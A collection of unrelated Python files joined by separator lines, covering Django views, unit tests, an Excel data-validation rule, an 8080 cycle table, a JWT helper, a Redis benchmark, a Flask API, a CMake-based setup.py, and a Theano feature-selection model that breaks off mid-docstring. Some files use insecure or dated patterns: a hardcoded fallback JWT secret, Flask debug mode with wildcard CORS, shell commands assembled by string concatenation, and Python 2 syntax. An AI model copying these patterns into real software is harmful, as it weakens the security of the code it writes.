# About page
class AboutView(TemplateView):
template_name = "about.html"
def get_context_data(self):
ctxt = super().get_context_data()
ctxt["num_services"] = 3
ctxt["skillset"] = [
"Python",
"JavaScript",
"HTML / CSS",
"PostgreSQL",
]
return ctxt
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import json
import sys
from django.urls import reverse
from nose.tools import assert_equal, assert_not_equal, assert_true, assert_false
from desktop.lib.django_test_util import make_logged_in_client
from useradmin.models import User
if sys.version_info[0] > 2:
from unittest.mock import patch, Mock, MagicMock
else:
from mock import patch, Mock, MagicMock
LOG = logging.getLogger(__name__)
class TestInstallExamples():
def setUp(self):
self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=True, is_admin=True)
self.user = User.objects.get(username="test")
def test_install_via_insert_mysql(self):
with patch('beeswax.views.beeswax_install_examples.SampleTable') as SampleTable:
with patch('beeswax.views.beeswax_install_examples.SampleQuery') as SampleQuery:
resp = self.client.post(reverse('beeswax:install_examples'), {'db_name': 'default'})
data = json.loads(resp.content)
assert_equal(0, data['status'], data)
assert_equal('', data['message'], data)
SampleTable.assert_called()
SampleQuery.assert_called()
|
import unittest
import asyncio
import asynctest
import asynctest.mock as amock
from opsdroid.__main__ import configure_lang
from opsdroid.core import OpsDroid
from opsdroid.connector import Connector
from opsdroid.__main__ import configure_lang
class TestConnectorBaseClass(unittest.TestCase):
"""Test the opsdroid connector base class."""
def setUp(self):
self.loop = asyncio.new_event_loop()
configure_lang({})
def test_init(self):
config = {"example_item": "test"}
connector = Connector(config, opsdroid=OpsDroid())
self.assertEqual(None, connector.default_room)
self.assertEqual("", connector.name)
self.assertEqual("test", connector.config["example_item"])
def test_property(self):
opsdroid = amock.CoroutineMock()
connector = Connector({"name": "shell"}, opsdroid=opsdroid)
self.assertEqual("shell", connector.configuration.get("name"))
def test_connect(self):
connector = Connector({}, opsdroid=OpsDroid())
with self.assertRaises(NotImplementedError):
self.loop.run_until_complete(connector.connect())
def test_listen(self):
connector = Connector({}, opsdroid=OpsDroid())
with self.assertRaises(NotImplementedError):
self.loop.run_until_complete(connector.listen())
def test_respond(self):
connector = Connector({}, opsdroid=OpsDroid())
with self.assertRaises(NotImplementedError):
self.loop.run_until_complete(connector.respond({}))
def test_react(self):
connector = Connector({}, opsdroid=OpsDroid())
reacted = self.loop.run_until_complete(connector.react({}, 'emoji'))
self.assertFalse(reacted)
def test_user_typing(self):
opsdroid = 'opsdroid'
connector = Connector({}, opsdroid=OpsDroid())
user_typing = self.loop.run_until_complete(
connector.user_typing(trigger=True))
assert user_typing is None
class TestConnectorAsync(asynctest.TestCase):
"""Test the async methods of the opsdroid connector base class."""
async def setup(self):
configure_lang({})
async def test_disconnect(self):
connector = Connector({}, opsdroid=OpsDroid())
res = await connector.disconnect()
assert res is None
|
#Rule 26 - In contact data file, the VOICE column must not contain any phone number or email ID
def no_phone_url_in_voice(fle, fleName, target):
import re
import os
import sys
import json
import openpyxl
import pandas as pd
from pandas import ExcelWriter
from pandas import ExcelFile
from dateutil.parser import parse
import validators
configFile = 'https://s3.us-east.cloud-object-storage.appdomain.cloud/sharad-saurav-bucket/Configuration.xlsx'
rule="No_phone_url_in_voice"
config=pd.read_excel(configFile)
newdf=config[config['RULE']==rule]
to_check=''
for index,row in newdf.iterrows():
to_check=row['TO_CHECK']
to_check=json.loads(to_check)
files_to_apply=to_check['files_to_apply']
columns_to_apply=to_check['columns_to_apply']
if(files_to_apply=='ALL' or fleName in files_to_apply):
def search_email(string):
email = re.findall(r'[\w\.-]+@[\w\.-]+', string)
if(len(email)!= 0):
return True
else:
return False
def find_phone(string):
phone = re.findall('\d{3}[-\.\s]??\d{3}[-\.\s]??\d{4}|\(\d{3}\)\s*\d{3}[-\.\s]??\d{4}|\d{3}[-\.\s]??\d{4}', string)
if(len(phone)!= 0):
return True
else:
return False
data=[]
df = pd.read_excel(fle)
df.index = range(2,df.shape[0]+2)
for index,row in df.iterrows():
for column_name in columns_to_apply:
column_value=row[column_name]
#print(voice)
if(pd.notnull(row[column_name])):
if(search_email(column_value)):
entry=[index,file,column_name+' has EMAIL in its contents']
print('The row '+str(index)+' in the file '+file+' has url in the '+column_name+' column')
data.append(entry)
if(find_phone(column_value)):
#print(index)
entry=[index,file,column_name+' has phone number in its contents']
print('The row '+str(index)+' in the file '+file+' has phone number in the '+column_name+' column')
data.append(entry)
df1 = pd.DataFrame(data, columns = ['ROW_NO', 'FILE_NAME', 'COMMENTS'])
if(ExcelFile(target).sheet_names[0] == 'Sheet1'):
with ExcelWriter(target, engine='openpyxl', mode='w') as writer:
df1.to_excel(writer,sheet_name=rule,index=False)
else:
with ExcelWriter(target, engine='openpyxl', mode='a') as writer:
df1.to_excel(writer,sheet_name=rule,index=False)
|
import os
from parallelm.pipeline import json_fields
def main_component_module(comp_desc):
main_module = os.path.splitext(comp_desc[json_fields.COMPONENT_DESC_PROGRAM_FIELD])[0]
return comp_desc[json_fields.COMPONENT_DESC_PACKAGE_FIELD] + "." + main_module
def assemble_cmdline_from_args(input_args):
cmdline_list = []
for arg in input_args:
cmdline_list.append("--" + arg)
cmdline_list.append(str(input_args[arg]))
return cmdline_list
|
from common.commands import *
# Constants for getting number of cycles for special cases
REGULAR = 0 # For commands that performs always for the same number of cycles
REGISTER = 0 # For commands that processes registers
MEMORY = 1 # For commands that processes memory cell
NEXT_CMD = 0 # For return and call commands when condition is not satisfied
RET = 1 # For return commands when condition is satisfied
CALL = 1 # For call commands when condition is satisfied
cycles = {
# Move, load and store
mov: [5, 7], # 5 for registers, 7 for memory
mvi: [7, 10], # 7 for registers, 10 for memory
lxi: [10],
stax: [7],
ldax: [7],
sta: [13],
lda: [13],
shld: [16],
lhld: [16],
xchg: [4],
# Stack operations
push: [11],
pop: [10],
xthl: [18],
sphl: [5],
# Jump
jmp: [10],
jc: [10],
jnc: [10],
jz: [10],
jnz: [10],
jp: [10],
jm: [10],
jpe: [10],
jpo: [10],
pchl: [5],
# Call
call: [17],
cc: [11, 17], # 11 for next command, 17 for call
cnc: [11, 17], # 11 for next command, 17 for call
cz: [11, 17], # 11 for next command, 17 for call
cnz: [11, 17], # 11 for next command, 17 for call
cp: [11, 17], # 11 for next command, 17 for call
cm: [11, 17], # 11 for next command, 17 for call
cpe: [11, 17], # 11 for next command, 17 for call
cpo: [11, 17], # 11 for next command, 17 for call
# Return
ret: [10],
rc: [5, 11], # 5 for next command, 11 for return
rnc: [5, 11], # 5 for next command, 11 for return
rz: [5, 11], # 5 for next command, 11 for return
rnz: [5, 11], # 5 for next command, 11 for return
rp: [5, 11], # 5 for next command, 11 for return
rm: [5, 11], # 5 for next command, 11 for return
rpe: [5, 11], # 5 for next command, 11 for return
rpo: [5, 11], # 5 for next command, 11 for return
# Restart
rst: [11],
# Increment and decrement
inr: [5, 10], # 5 for registers, 10 for memory
dcr: [5, 10], # 5 for registers, 10 for memory
inx: [5],
dcx: [5],
# Add
add: [4, 7], # 4 for registers, 7 for memory
adc: [4, 7], # 4 for registers, 7 for memory
adi: [7],
aci: [7],
dad: [10],
# Subtract
sub: [4, 7], # 4 for registers, 7 for memory
sbb: [4, 7], # 4 for registers, 7 for memory
sui: [7],
sbi: [7],
# Logical
ana: [4, 7], # 4 for registers, 7 for memory
xra: [4, 7], # 4 for registers, 7 for memory
ora: [4, 7], # 4 for registers, 7 for memory
cmp: [4, 7], # 4 for registers, 7 for memory
ani: [7],
xri: [7],
ori: [7],
cpi: [7],
# Rotate
rlc: [4],
rrc: [4],
ral: [4],
rar: [4],
# Specials
cma: [4],
stc: [4],
cmc: [4],
daa: [4],
# Input/Output
in_cmd: [10],
out: [10],
# Control
ei: [4],
di: [4],
nop: [4],
hlt: [7]
}
|
# -*- coding: utf-8 -*-
import jwt
from jwt import InvalidTokenError
from datetime import datetime, timedelta
from rust.core.exceptions import BusinessError
import settings
SECRET = 'aSsJKgdAH2Dkaj1shd4ahsh' if not hasattr(settings, 'JWT_SECRET') else settings.JWT_SECRET
CURRENT_TOKEN = None
class JWTService(object):
@staticmethod
def get_current():
return CURRENT_TOKEN
@staticmethod
def set_current(token):
global CURRENT_TOKEN
CURRENT_TOKEN = token
def encode(self, data):
ext_sec = 2*60*60 if not hasattr(settings, 'JWT_EXT_SEC') else settings.JWT_EXT_SEC
payload = {
'data': data,
'exp': datetime.now() + timedelta(seconds=ext_sec)
}
return jwt.encode(payload, SECRET, algorithm='HS256')
def decode(self, token):
try:
payload = jwt.decode(token, SECRET, algorithm='HS256')
except InvalidTokenError:
raise BusinessError(u'不合法的token')
return payload['data']
|
# coding: utf-8
from __future__ import print_function
import time
from twisted.internet import defer
from twisted.internet import reactor
import txredisapi as redis
HOST = 'localhost'
PORT = 6379
N = 1000
@defer.inlineCallbacks
def test_setget():
key = 'test'
conn = yield redis.Connection(HOST, PORT)
start = time.time()
for i in xrange(N):
yield conn.set(key, 'test_data')
yield conn.get(key)
print("done set-get: %.4fs." % ((time.time() - start) / N))
@defer.inlineCallbacks
def test_lrange():
key = 'test_list'
list_length = 1000
conn = yield redis.Connection(HOST, PORT)
yield defer.DeferredList([conn.lpush(key, str(i)) for i in xrange(list_length)])
start = time.time()
for i in xrange(N):
yield conn.lrange(key, 0, 999)
print("done lrange: %.4fs." % ((time.time() - start) / N))
@defer.inlineCallbacks
def run():
yield test_setget()
yield test_lrange()
reactor.stop()
run()
reactor.run()
|
from flask import Flask, request, jsonify
from scraper import run
app = Flask(__name__)
app.config["DEBUG"] = True
items = []
@app.route('/news-items', methods=['GET'])
def api_all():
global items
if not items:
items = run()
response = jsonify(items)
response.headers.add("Access-Control-Allow-Origin", "*")
return response
app.run()
|
# -*- coding: utf-8 -*-
import os
import platform
import re
import subprocess
import sys
from distutils.version import LooseVersion
from setuptools import setup, find_packages, Extension
from setuptools.command.build_ext import build_ext
def fix_includes_hack():
# IDK what happened to the GitHub Actions container image, but suddenly the build started
# failing on Windows with this error:
# MSIWarp\src\lib\warp\warp.cpp(375,32): error C3861: 'back_inserter': identifier not found
header_contents = open('MSIWarp/src/lib/warp/warp.hpp', 'rt').read()
if '<iterator>' not in header_contents:
header_contents = header_contents.replace(
'#include <vector>', '#include <vector>\n#include <iterator>'
)
open('MSIWarp/src/lib/warp/warp.hpp', 'wt').write(header_contents)
## This CMakeExtension stuff is part of MSIWarp vendoring (bundling a built copy of their library with our library)
## It's hacky and should be removed as soon as there's a MSIWarp package available on PyPI
class CMakeExtension(Extension):
def __init__(self, name, sourcedir=''):
Extension.__init__(self, name, sources=[])
self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(build_ext):
def run(self):
fix_includes_hack()
try:
out = subprocess.check_output(['cmake', '--version'])
except OSError:
raise RuntimeError(
"CMake must be installed to build the following extensions: "
+ ", ".join(e.name for e in self.extensions)
)
if platform.system() == "Windows":
cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)', out.decode()).group(1))
if cmake_version < '3.1.0':
raise RuntimeError("CMake >= 3.1.0 is required on Windows")
for ext in self.extensions:
self.build_extension(ext)
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
cmake_args = [
'-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,
'-DPYTHON_EXECUTABLE=' + sys.executable,
]
cfg = 'Debug' if self.debug else 'Release'
build_args = ['--config', cfg]
if platform.system() == "Windows":
cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(cfg.upper(), extdir)]
if sys.maxsize > 2 ** 32:
cmake_args += ['-A', 'x64']
build_args += ['--', '/m']
else:
cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg]
build_args += ['--', '-j2']
env = os.environ.copy()
env['CXXFLAGS'] = '{} -DVERSION_INFO=\\"{}\\"'.format(
env.get('CXXFLAGS', ''), self.distribution.get_version()
)
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env)
subprocess.check_call(['cmake', '--build', '.'] + build_args, cwd=self.build_temp)
print() # Add an empty line for cleaner output
setup(
name='msi_recal',
version='0.2.3',
description='Pipeline for mostly unsupervised recalibration of imzML mass spectrometry data',
url='https://github.com/metaspace2020/metaspace/tree/master/metaspace/recal',
author='Alexandrov Team, EMBL',
package_dir={
'msiwarp': 'MSIWarp/src/python-bindings/msiwarp',
'': '.',
},
packages=[*find_packages(), 'msiwarp', 'msiwarp.util'],
package_data={'msi_recal': ['dbs/*.csv']},
install_requires=[
'numpy',
'scipy',
'matplotlib',
'seaborn',
'pyimzml',
'pyMSpec',
'cpyMSpec',
'scikit-learn',
'typing-extensions; python_version < "3.8"',
],
# Vendorize MSIWarp because it's not on PyPI yet
ext_modules=[CMakeExtension('msiwarp/msiwarp_cpp')],
cmdclass={"build_ext": CMakeBuild},
)
|
#!/usr/bin/env python
# Copyright (C) 2006 by Johannes Zellner, <johannes@zellner.org>
# modified by mac@calmar.ws to fit my output needs
import sys
import os
def echo(msg):
os.system('echo -n "' + str(msg) + '"')
def out(n):
os.system("tput setab " + str(n) + "; echo -n " + ("\"% 4d\"" % n))
os.system("tput setab 0")
# normal colors 1 - 16
os.system("tput setaf 16")
for n in range(8):
out(n)
echo ("\n")
for n in range(8, 16):
out(n)
echo("\n")
echo("\n")
y=16
while y < 231:
for z in range(0,6):
out(y)
y += 1
echo("\n")
echo("\n")
for n in range(232, 256):
out(n)
if n == 237 or n == 243 or n == 249:
echo ("\n")
echo("\n")
|
"""
A module of deep feature selection based on multilayer perceptrons.
This module applies a deep structure with not too many hidden layers.
Thus, stochastic gradient descent (back-prop) is used in optimization.
Copyright (c) 2008-2013, Theano Development Team All rights reserved.
Yifeng Li
CMMT, UBC, Vancouver
Sep 23, 2014
Contact: yifeng.li.cn@gmail.com
"""
from __future__ import division
import pickle
import time
import math
import copy
import numpy
import theano
import theano.tensor as T
from logistic_sgd import LogisticRegression
import classification as cl
def relu(x):
return 0.5*(x+abs(x))
class InputLayer(object):
def __init__(self, input, n_in, w=None):
"""
In the input layer x_i is multiplied by w_i.
Yifeng Li, in UBC.
Aug 26, 2014.
"""
self.input=input
if w is None:
w_values = numpy.ones((n_in,), dtype=theano.config.floatX)
# w_values = numpy.asarray(rng.uniform(
# low=0, high=1,
# size=(n_in,)), dtype=theano.config.floatX)
w = theano.shared(value=w_values, name='w', borrow=True)
self.w=w
#u_values = numpy.ones((n_in,), dtype=theano.config.floatX)
#u = theano.shared(value=u_values, name='u', borrow=True)
#self.u=u # auxiliary variable for non-negativity
self.output = self.w * self.input
#self.params=[w,u]
self.params=[w]
def get_predicted(self,data):
return self.w * data
class HiddenLayer(object):
def __init__(self, rng, input, n_in, n_out, W=None, b=None,
activation=T.tanh):
"""
Typical hidden layer of a MLP: units are fully-connected and have
sigmoidal activation function. Weight matrix W is of shape (n_in,n_out)
and the bias vector b is of shape (n_out,).
NOTE : The nonlinearity used here is tanh by default.
Hidden unit activation is thus given by: tanh(dot(input,W) + b)
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input: theano.tensor.dmatrix
:param input: a symbolic tensor of shape (n_examples, n_in)
:type n_in: int
:param n_in: dimensionality of input
:type n_out: int
:param n_out: number of hidden units
:type activation: theano.Op or function
:param activation: Non linearity to be applied in the hidden
layer
"""
self.input = input
# `W` is initialized with `W_values` which is uniformely sampled
# from sqrt(-6./(n_in+n_hidden)) and sqrt(6./(n_in+n_hidden))
# for tanh activation function
# the output of uniform if converted using asarray to dtype
# theano.config.floatX so that the code is runable on GPU
# Note : optimal initialization of weights is dependent on the
# activation function used (among other things).
# For example, results presented in [Xavier10] suggest that you
# should use 4 times larger initial weights for sigmoid
# compared to tanh
# We have no info for other function, so we use the same as
# tanh.
self.activation=activation
if W is None:
W_values = numpy.asarray(rng.uniform(
low=-numpy.sqrt(6. / (n_in + n_out)),
high=numpy.sqrt(6. / (n_in + n_out)),
size=(n_in, n_out)), dtype=theano.config.floatX)
if activation == theano.tensor.nnet.sigmoid:
W_values *= 4
W = theano.shared(value=W_values, name='W', borrow=True)
if b is None:
b_values = numpy.zeros((n_out,), dtype=theano.config.floatX)
b = theano.shared(value=b_values, name='b', borrow=True)
self.W = W
self.b = b
lin_output = T.dot(input, self.W) + self.b
self.output = (lin_output if activation is None
else activation(lin_output))
# parameters of the model
self.params = [self.W, self.b]
def get_predicted(self,data):
lin_output = T.dot(data, self.W) + self.b
output = (lin_output if self.activation is None
else self.activation(lin_output))
return output
class DFS(object):
"""
Deep feature selection class. One-one input layer + MLP.
"""
def __init__(self, rng, n_in, n_hidden, n_out, x=None, y=None, activation=T.tanh,
lambda1=0.001, lambda2=1.0, alpha1=0.001, alpha2=0.0):
"""Initialize the parameters for the DFL class.
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type n_in: int
:param n_in: number of input units, the dimension of the space in
which the datapoints lie
:type n_hidden: int
:param n_hidden: number of hidden units
:type n_out: int
:param n_out: number of output units, the dimension of the space in
which the labels lie
activation: activation function, from {T.tanh, T.nnet.sigmoid}
lambda1: float scalar, control the sparsity of the input weights.
The regularization term is lambda1( (1-lambda2)/2 * ||w||_2^2 + lambda2 * ||w||_1 ).
Thus, the larger lambda1 is, the sparser the input weights are.
lambda2: float scalar, control the smoothness of the input weights.
The regularization term is lambda1( (1-lambda2)/2 * ||w||_2^2 + lambda2 * ||w||_1 ).
Thus, the larger lambda2 is, the smoother the input weights are.
alpha1: float scalar, control the sparsity of the weight matrices in MLP.
The regularization term is alpha1( (1-alpha2)/2 * \sum||W_i||_2^2 + alpha2 \sum||W_i||_1 ).
Thus, the larger alpha1 is, the sparser the MLP weights are.
alpha2: float scalar, control the smoothness of the weight matrices in MLP.
The regularization term is alpha1( (1-alpha2)/2 * \sum||W_i||_2^2 + alpha2 \sum||W_i||_1 ).
Thus, the larger alpha2 is, the smoother the MLP weights are.
"""
if not x:
x=T.matrix('x')
self.x=x
if not y:
y=T.ivector('y')
self.y=y
self.hidden_layers=[]
self.params=[]
self.n_layers=len(n_hidden)
input_layer=InputLayer(input=self.x,n_in=n_in)
self.params.extend(input_layer.params)
self.input_layer=input_layer
for i in range(len(n_hidden)):
if i==0: # first hidden layer
hd=HiddenLayer(rng=rng, input=self.input_layer.output, n_in=n_in, n_out=n_hidden[i],
activation=activation)
else:
hd=HiddenLayer(rng=rng, input=self.hidden_layers[i-1].output, n_in=n_hidden[i-1], n_out=n_hidden[i],
activation=activation)
self.hidden_layers.append(hd)
self.params.extend(hd.params)
# The logistic regression layer gets as input the hidden units
# of the hidden layer
if len(n_hidden)<=0:
self.logRegressionLayer = LogisticRegression(
input=self.input_layer.output,
n_in=n_in,
n_out=n_out)
else:
self.logRegressionLayer = LogisticRegression(
input=self.hidden_layers[-1].output,
n_in=n_hidden[-1],
n_out=n_out)
self.params.extend(self.logRegressionLayer.params)
# regularization terms
self.L1_input=T.abs_(self.input_layer.w).sum()
self.L2_input=(self.input_layer.w **2).sum()
self.hinge_loss_neg=(T.maximum(0,-self.input_layer.w)).sum() # penalize negative values
self.hinge_loss_pos=(T.maximum(0,self.input_layer.w)).sum() # # penalize positive values
L1s=[]
L2_sqrs=[]
#L1s.append(abs(self.hidden_layers[0].W).sum())
for i in range(len(n_hidden)):
L1s.append (T.abs_(self.hidden_layers[i].W).sum())
L2_sqrs.append((self.hidden_layers[i].W ** 2).sum())
L1s.append(T.abs_(self.logRegressionLayer.W).sum())
L2_sqrs.append((self.logRegressionLayer.W ** 2).sum())
self.L1 = T.sum(L1s)
self.L2_sqr = T.sum(L2_sqrs)
# negative log likelihood of the MLP is given by the negative
# log likelihood of the output of the model, computed in the
# logistic regression layer
self.negative_log_likelihood = self.logRegressionLayer.negative_log_likelihood
# same holds for the function computing the number of errors
self.errors = self.logRegressionLayer.errors(self.y)
# lambda3=0.5
# self.cost = self.negative_log_likelihood(self.y) \
# + lambda1*(1.0-lambda2)*0.5*self.L2_input \
# + lambda1*lambda2*(1.0-lambda3)*self.hinge_loss_pos \
# + lambda1*lambda2*lambda3*self.hinge_loss_neg \
# + alpha1*(1.0-alpha2)*0.5 * self.L2_sqr + alpha1*alpha2 * self.L1
self.cost = self.negative_log_likelihood(self.y) \
+ lambda1*(1.0-lambda2)*0.5*self.L2_input \
+ lambda1*lambda2*self.L1_input \
+ alpha1*(1.0-alpha2)*0.5* self.L2_sqr + alpha1*alpha2 * self.L1
#self.cost = self.negative_log_likelihood(self.y) \
# + lambda1*(1.0-lambda2)*(0.5/n_in)*self.L2_input \
# + lambda1*lambda2*(1/n_in)*self.L1_input \
# + alpha1*(1.0-alpha2)*0.5 * self.L2_sqr + alpha1*alpha2 * self.L1
self.y_pred=self.logRegressionLayer.y_pred
self.y_pred_prob=self.logRegressionLayer.y_pred_prob
def build_train_function(self, train_set_x, train_set_y, batch_size, alpha, learning_rate_shared):
"""
Create a function to compute the mistakes that are made by the model.
"""
index = T.lscalar('index') # index to a [mini]batch
# compute the gradients with respect to the model parameters
grads = T.grad(self.cost, self.params)
# add momentum
# initialize the delta_i-1
delta_before=[]
for param_i in self.params:
delta_before_i=theano.shared(value=numpy.zeros(param_i.get_value().shape))
delta_before.append(delta_before_i)
updates = []
for param_i, grad_i, delta_before_i in zip(self.params, grads, delta_before):
delta_i=-learning_rate_shared * grad_i + alpha*delta_before_i
updates.append((param_i, param_i + delta_i ))
updates.append((delta_before_i,delta_i))
train_model_cost = theano.function([index], self.cost, updates=updates,
givens={
self.x: train_set_x[index * batch_size: (index + 1) * batch_size],
self.y: train_set_y[index * batch_size: (index + 1) * batch_size]},
name='train')
return train_model_cost
def build_valid_function(self,valid_set_x, valid_set_y, batch_size):
"""
Build symbolic validation function.
"""
n_valid_batches = int(math.ceil(valid_set_x.get_value(borrow=True).shape[0] / batch_size))
index = T.lscalar('index') # index to a [mini]batch
valid_error_i = theano.function([index], self.errors,
givens={self.x: valid_set_x[index * batch_size:(index + 1) * batch_size],
self.y: valid_set_y[index * batch_size:(index + 1) * batch_size]},
name='valid')
# Create a function that scans the entire validation set
def valid_error():
return [valid_error_i(i) for i in xrange(n_valid_batches)]
return valid_error
def build_test_function(self, test_set_x, batch_size):
"""
Build symbolic test function.
"""
n_test_batches = int(math.ceil(test_set_x.get_value(borrow=True).shape[0] / batch_size))
index = T.lscalar('index') # index to a [mini]batch
test_pred_i = theano.function([index], [self.y_pred,self.y_pred_prob],
givens={self.x: test_set_x[index * batch_size : (index + 1) * batch_size]},
name='test')
# Create a function that scans the entire test set
def test_pred():
y_pred=[]
y_pred_prob=[]
for i in xrange(n_test_batches):
label,prob=test_pred_i(i)
y_pred.extend(label)
y_pred_prob.extend(prob)
return y_pred,y_pred_prob
return test_pred
def get_predicted(self,data):
for i in range(len(self.hidden_layers)):
data=self.hidden_layers[i].get_predicted(data)
p_y_given_x = T.nnet.softmax(T.dot(data, self.logRegressionLayer.W) + self.logRegressionLayer.b)
y_pred = T.argmax(p_y_given_x, axis=1)
y_pred_prob = T.argmax(p_y_given_x, axis=1)
return y_pred,y_pred_prob
def get_params(self):
return copy.deepcopy(self.params)
def set_params(self, given_params):
self.params=given_params
def print_params(self):
for param in self.params:
print param.get_value(borrow=True)
def save_params(self,filename):
f=open(filename,'w') # remove existing file
f.close()
f=open(filename,'a')
for param in self.params:
pickle.dump(param.get_value(borrow=True),f)
f.close()
def read_params(filename):
f=open(filename,'r')
params=pickle.load(f)
f.close()
return params
def train_model(train_set_x_org=None, train_set_y_org=None, valid_set_x_org=None, valid_set_y_org=None,
learning_rate=0.1, alpha=0.01,
lambda1=0.001, lambda2=1.0, alpha1=0.001, alpha2=0.0,
n_hidden=[256,128,16], n_epochs=1000, batch_size=100,
activation_func="tanh", rng=numpy.random.RandomState(100),
max_num_epoch_change_learning_rate=100,max_num_epoch_change_rate=0.8,learning_rate_decay_rate=0.8):
"""
Train a deep feature selection model.
INPUTS:
train_set_x_org: numpy 2d array, each row is a training sample.
train_set_y_org: numpy vector of type int {0,1,...,C-1}, class labels of training samples.
valid_set_x_org: numpy 2d array, each row is a validation sample.
This set is to monitor the convergence of optimization.
valid_set_y_org: numpy vector of type int {0,1,...,C-1}, class labels of validation samples.
learning_rate: float scalar, the initial learning rate.
alpha: float, parameter to trade off the momentum term.
lambda1: float scalar, control the sparsity of the input weights.
The regularization term is lambda1( (1-lambda2)/2 * ||w||_2^2 + lambda2 * ||w||_1 ).
Thus, the larger lambda1 is, the sparser the input weights are.
lambda2: float scalar, control the smoothness of the input weights.
The regularization term is lambda1( (1-lambda2)/2 * ||w||_2^2 + lambda2 * ||w||_1 ).
Thus, the larger lambda2 is, the smoother the input weights are.
alpha1: float scalar, control the sparsity of the weight matrices in MLP.
The regularization term is alpha1( (1-alpha2)/2 * \sum||W_i||_2^2 + alpha2 \sum||W_i||_1 ).
Thus, the larger alpha1 is, the sparser the MLP weights are.
alpha2: float scalar, control the smoothness of the weight matrices in MLP.
The regularization term is alpha1( (1-alpha2)/2 * \sum||W_i||_2^2 + alpha2 \sum||W_i||_1 ).
Thus, the larger alpha2 is, the smoother the MLP weights are.
n_hidden, vector of int, n_hidden[i]: number of hidden units of the i-th layer.
n_epochs: int scalar, the maximal number of epochs.
batch_size: int scalar, minibatch size.
activation_func: string, specify activation function. {"tanh" (default),"sigmoid"}
rng: numpy random number state.
OUTPUTS:
classifier: object of MLP, the model learned, returned for testing.
training_time: float, training time in seconds.
"""
train_set_x = theano.shared(numpy.asarray(train_set_x_org,dtype=theano.config.floatX),borrow=True)
train_set_y = T.cast(theano.shared(numpy.asarray(train_set_y_org,dtype=theano.config.floatX),borrow=True),'int32')
valid_set_x = theano.shared(numpy.asarray(valid_set_x_org,dtype=theano.config.floatX),borrow=True)
valid_set_y = T.cast(theano.shared(numpy.asarray(valid_set_y_org,dtype=theano.config.floatX),borrow=True),'int32')
# compute number of minibatches for training, validation and testing
n_train_batches = int(math.ceil(train_set_x.get_value(borrow=True).shape[0] / batch_size))
# shared variable to reduce the learning rate
learning_rate_shared=theano.shared(learning_rate,name='learn_rate_shared')
decay_rate=T.scalar(name='decay_rate',dtype=theano.config.floatX)
reduce_learning_rate=theano.function([decay_rate],learning_rate_shared,updates=[(learning_rate_shared,learning_rate_shared*decay_rate)])
## define the model below
num_feat=train_set_x.get_value(borrow=True).shape[1] # number of features
n_cl=len(numpy.unique(train_set_y_org)) # number of classes
activations={"tanh":T.tanh,"sigmoid":T.nnet.sigmoid,"relu":relu}
activation=activations[activation_func]
# build a MPL object
classifier = DFS(rng=rng, n_in=num_feat, n_hidden=n_hidden, n_out=n_cl,
lambda1=lambda1, lambda2=lambda2, alpha1=alpha1, alpha2=alpha2,
activation=activation)
train_model_one_iteration=classifier.build_train_function(train_set_x, train_set_y, batch_size,
alpha, learning_rate_shared)
validate_model=classifier.build_valid_function(valid_set_x, valid_set_y, batch_size)
print '... training'
# early-stopping parameters
patience = 5000 # look as this many examples regardless
patience_increase = 2 # wait this much longer when a new best is
# found
improvement_threshold = 0.995 # a relative improvement of this much is
# considered significant
validation_frequency = min(n_train_batches, patience / 2)
# go through this many
# minibatche before checking the network
# on the validation set; in this case we
# check every epoch
best_validation_loss = numpy.inf
#max_num_epoch_change_learning_rate=100
max_num_epoch_not_improve=3*max_num_epoch_change_learning_rate
#max_num_epoch_change_rate=0.8
#learning_rate_decay_rate=0.8
epoch_change_count=0
start_time = time.clock()
done_looping = False
epoch = 0
while (epoch < n_epochs) and (not done_looping):
epoch = epoch + 1
epoch_change_count=epoch_change_count+1
if epoch_change_count % max_num_epoch_change_learning_rate ==0:
reduce_learning_rate(learning_rate_decay_rate)
max_num_epoch_change_learning_rate= \
cl.change_max_num_epoch_change_learning_rate(max_num_epoch_change_learning_rate,max_num_epoch_change_rate)
max_num_epoch_not_improve=3*max_num_epoch_change_learning_rate
epoch_change_count=0
for minibatch_index in xrange(n_train_batches):
minibatch_avg_cost = train_model_one_iteration(minibatch_index)
# iteration number
iter = (epoch - 1) * n_train_batches + minibatch_index
if (iter + 1) % validation_frequency == 0:
# compute zero-one loss on validation set
validation_losses = validate_model()
this_validation_loss = numpy.mean(validation_losses)
print('epoch %i, minibatch %i/%i, validation error %f %%' % \
(epoch, minibatch_index + 1, n_train_batches,
this_validation_loss * 100.))
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
num_epoch_not_improve=0
if this_validation_loss < best_validation_loss:
#improve patience if loss improvement is good enough
if this_validation_loss < best_validation_loss * \
improvement_threshold:
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
# save a copy of the currently best model parameter
best_model_params=classifier.get_params()
if patience <= iter:
done_looping = True
break
if this_validation_loss >= best_validation_loss:
num_epoch_not_improve=num_epoch_not_improve+1
if num_epoch_not_improve>=max_num_epoch_not_improve:
done_looping = True
break
# set the best model parameters
classifier.set_params(best_model_params)
end_time = time.clock()
training_time=end_time-start_time
print 'Training time: %f' %(training_time/60)
print 'Optimization complete with best validation score of %f,' %(best_validation_loss * 100.)
return classifier, training_time
def test_model(classifier, test_set_x_org, batch_size):
"""
Predict class labels of given data using the model learned.
INPUTS:
classifier_trained: object of DFS, the model learned by function "train_model".
